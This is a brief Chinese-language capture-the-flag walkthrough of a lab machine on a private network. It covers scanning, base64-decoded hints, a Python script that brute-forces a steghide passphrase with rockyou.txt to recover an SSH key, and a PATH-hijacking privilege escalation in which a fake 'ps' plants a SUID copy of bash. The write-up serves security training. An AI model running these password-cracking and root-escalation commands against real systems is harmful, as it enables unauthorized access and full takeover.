kali:192.168.111.111
靶机:192.168.111.149
信息收集
端口扫描
目录爆破
查看index.html源码发现一段字符串
base64解密
查看robots.txt发现一段密文:eW91IGZpbmQgdGhlIGhpZGRlbiBkaXI=,base64解密
访问/DRAGON BALL/该目录
发现一个网页
点击download发现是张图片,猜测是图片隐写
爆破密码
#!/usr/bin/python3
import os
with open('/usr/share/wordlists/rockyou.txt', encoding='utf-8', mode='r') as f1:
for i in f1:
i = i.strip()
a = os.system(f'steghide extract -sf aj.jpg -p {i}')
if a != 256:
print(f'密码:{i}')
break
密码是:love,爆破出文件id_rsa,结合之前发现的xmen用户登录ssh
chmod 400 id_rsa
ssh xmen@192.168.111.149 -i id_rsa
提权
查找具有suid权限的文件
发现/home/xmen/script/shell同时会执行ps命令
修改环境变量提权
echo 'cp /bin/bash /tmp/bash;chmod 4777 /tmp/bash' > /tmp/ps
chmod 777 /tmp/ps
export PATH=/tmp:$PATH
/home/xmen/script/shell
/tmp/bash -p
获得flag